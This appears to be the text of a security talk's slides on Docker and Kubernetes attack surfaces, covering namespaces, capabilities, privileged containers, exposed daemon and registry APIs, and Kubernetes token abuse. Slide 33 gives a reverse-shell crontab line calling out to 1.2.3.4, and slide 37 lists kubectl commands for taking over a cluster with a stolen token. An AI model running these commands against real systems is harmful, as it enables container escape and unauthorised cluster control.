Attack Surface of Docker

1. Hacking Docker
the Easy Way

2. HELLO!
I am Oritz
A web 🐶 & script 👶
Steam 💖 +1
English is bad

3. Docker Introduction
» Started in 2013
» Written in Go
» Very active codebase (~ 33,000 commits & 44,000 stars )
» Lots of interest from Big Tech Co’s ( e.g. Google/Microsoft/RedHat/IBM )
» Delivering Containers as a Service ( e.g. AWS/GKE/Azure/Aliyun )
» More quickly and flexibility than traditional virtualization

4. Container vs VM

5. Our process is easy
Docker Security
Overview
Hacking Docker Hacking Container
Management Platform

6. Docker security Overview
Namespaces, Cgroups, Capabilities and more

7. Namespaces
Control what a process can see
» PID
» Mount
» Network
» UTS
» IPS
» User
Namespaces & Cgroups
Cgroups
Control what a process can use
» Memory
» CPU
» Devices
» Blkio
» Net_prio
» Freezer
» …

8. Capabilities
Break up the monolithic root privilege
» Useful for commands that need one privilege
» Docker drops all capabilities except those needed
» By default, a container own only 14 of 37 capabilities
» Docker supports the addition and removal of capabilities
» --privileged flag will give extended privileges to the container
Kernel Capabilities

9. Seccomp
Control the system calls that a
process can make
The default seccomp profile
provides a sane default for
running containers with
seccomp and disables around 44
system calls out of 300+
Seccomp & Kernel Modules
MAC
Give fine grained control to restrict
access to system resources
» AppArmor
» SELinux
» GRSEC
» TOMOYO
» …

10. “OK, OK, We have known that docker
is secure. But how to hack docker?
Please show us the exploit.”

11. Hacking Docker
Kernel, Privilege, Daemon and Registry

12. Am I in A Container?
» ps aux
» cat /proc/self/attr/current
» cat /.dockerenv
» cat /proc/self/cgroup
» mount
» …

13. Vulnerabilities in Docker images
» Heart Bleed
» Glibc Ghost
» Shell Shock
» SSL Death Alert
» …

14. Attack surface of Docker

15. Linux Kernel
Containers share the kernel of the host

16. DirtyCow
Docker Container Escape PoC
CVE-2016-5195

17. CaaS Platform
» KVM
» XEN
» Escape From
The Docker
KVM-QEMU
Machine

18. Docker in Docker

19. Privileged

20. What privileged flag do
» Set empty process label
» Warn of incompatibility with user namespaces
» Add all host devices from /dev
» Add device cgroup access rwm allow
» Add all capabilities
» Clear read only flag for /sys mount
» Set read only paths to nil (*specs.Spec).Linux.ReadonlyPaths = nil
» Set masked paths to nil (*specs.Spec).Linux.MaskedPaths = nil
» Clear read only flag for cgroup mount
» Set app armor profile "unconfined"

21. Have a look at /dev
docker run --privileged

22. Mount Host directory

23. Docker Daemon
The docker group grants privileges equivalent to the root user

24. Docker Swarm

25. Docker Remote API
docker daemon -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock

26. Docker Registry
A server side application that stores and lets you distribute Docker images.

27. Registry Server Unauth

28. Pull and Push
Download each blob using the API or just run “docker pull xxx.xx/xx”

29. Hacking Container
Management Platform
Take Kubernetes as an Example

30. Kubernetes

31. API Server Ports

32. API Server Unauth
myapp.yaml
» kubectl create -f myapp.yaml
» kubectl --namespace=default exec -it myapp bash

33. Escape Docker
» echo -e "* * * * * root bash -i >& /dev/tcp/1.2.3.4/80
0>&1n" >> /mnt/etc/crontab

34. Service Accounts

35. Token in Pods

36. Token in Pods

37. Hacking Kubernetes
» kubectl config set-cluster pwned --server=https://${public_ip}
--insecure-skip-tls-verify
» kubectl config set-credentials pwn --token=${serviceacount_token}
» kubectl config set-context pwned --cluster=pwned --user=pwn
» kubectl config use-context pwned

38. Find 0day in Github issues

39. There are more interesting problems yet to be solved with docker

40. How to find next exploit?
Read the official documents carefully and
Focus on the events of developer community

41. THANKS!
Any questions?
You can find me at
@oritz
https://0x0d.im